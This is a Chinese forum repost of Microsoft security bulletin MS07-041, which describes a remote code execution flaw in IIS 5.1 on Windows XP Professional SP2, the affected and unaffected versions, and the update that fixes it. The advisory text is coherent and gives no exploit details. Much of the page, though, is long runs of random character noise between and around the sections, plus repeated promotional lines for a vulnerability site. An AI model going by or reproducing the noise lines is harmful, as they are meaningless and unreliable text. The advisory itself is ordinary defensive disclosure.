# d- B  K  F7 b1 O0 D2 L- T. I* s4 y) I6 z6 N

" w4 y  o% M. E; _' }
8 `( P: W: z3 M' J$ T2 `( ~2 z: z! T

- Z: c8 k! z. Z+ i* s- ^* e/ N% \6 n% f+ t, z# F* f5 {

3 o# d3 Z; t2 `: d3 ~) K; c' M" s4 N$ n1 F% H" `$ I: T" P. E5 w7 t
& u6 l; M3 ?$ Y2 R! u% a

' \; }: E/ c+ p' M4 Z, a8 t% b9 |1 I+ g9 n

5 q  B) }& O8 A1 u+ Q' s9 l, q& H, v5 y4 q0 Y0 o

9 T; t# `0 ?. C% v% M. }/ j6 T* k3 E& u  ~- d5 C) i
3 [/ S/ j3 C9 f- m5 W: R4 m9 n

* M2 k+ r$ Q3 G6 @+ E公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

MS07-041:Internet Information Services中漏洞
发布日期: 七月 10, 2007版本: 1.0
& i0 |/ P6 n+ g9 X5 S, {$ c/ Q
摘要:
7 z9 @! y& ?# c. j
此重要安全更新可解决一个秘密报告的漏洞。 如果攻击者向 Windows XP Professional Service Pack 2 上 Internet Information Services (IIS) 5.1 宿主的网页发送特制的 URL 请求,则此漏洞可能允许远程执行代码。IIS 5.1 不是 Windows XP Professional Service Pack 2 默认安装的一部分。成功利用此漏洞的攻击者可以完全控制受影响的系统。

9 u" p& i$ B/ [# b% w  I: H3 {( X
这是针对所有支持的 Windows XP Service Pack 2 32 位版本的重要安全更新。此安全更新通过对 Internet Information Services 中的内存请求进行检查来解决该漏洞。

! _! \# l% P) E
建议: Microsoft 建议用户立即应用此更新。

- P( |. M3 d5 X) z
受影响的软件

+ g3 F7 d" H* S) U
软件 组件 最大安全影响 综合严重程度等级 此更新替代的公告 Windows XP Professional Service Pack 2 Microsoft Internet Information Services (IIS) 5.1 远程执行代码 重要 无

. R( B- O5 s1 ~- M7 ^! R) J, R8 L
不受影响的软件
; X. Q1 n0 ~3 R5 R2 O
操作系统 Windows 2000 Service Pack 4 Windows XP Home Service Pack 2 Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition 和 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 SP1(用于基于 Itanium 的系统)以及 Windows Server 2003 SP2(用于基于 Itanium 的系统) Windows Vista Windows Vista x64 Edition
8 v: W/ L5 L% b! Q0 n
微软的安全公告:
2 A& w  @7 @1 o$ l# D7 S
http://www.microsoft.com/china/technet/security/bulletin/MS07-041.mspx

8 T9 N4 B0 S3 j/ w: [6 l5 R
(以上链接均连到第三方网站)

2 k0 I! W! R+ E( G8 L6 x, C3 R, V" ~3 l/ x# [2 V7 w
$ X& N. d9 J  h$ E4 Y: g: @
" {9 n- P7 F7 V" Z. d% f# ?% @
: _) H6 q9 A6 o

7 S. L# U' G# @0 z' d& R7 [) e! p- h8 T

" d6 [3 c% _0 ^  Y. M, `" X, m5 A. \; k" t9 B; d

1 }7 }8 x( q4 X9 G7 |+ o  h' X! a. x, S# _

* S6 m) D7 j( R, B& _" j+ k3 a8 G9 y9 H  `6 I' h; r

, [$ S! @6 L4 }4 ?" C6 H9 a8 J! v( a' m8 n3 U
: b  x/ W5 `9 ?- v3 y. m7 l

4 B- M$ T6 M' Y6 M7 N& H
% z9 r' ^, C4 |, l7 I
5 |( v3 G8 t" J5 J6 \公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表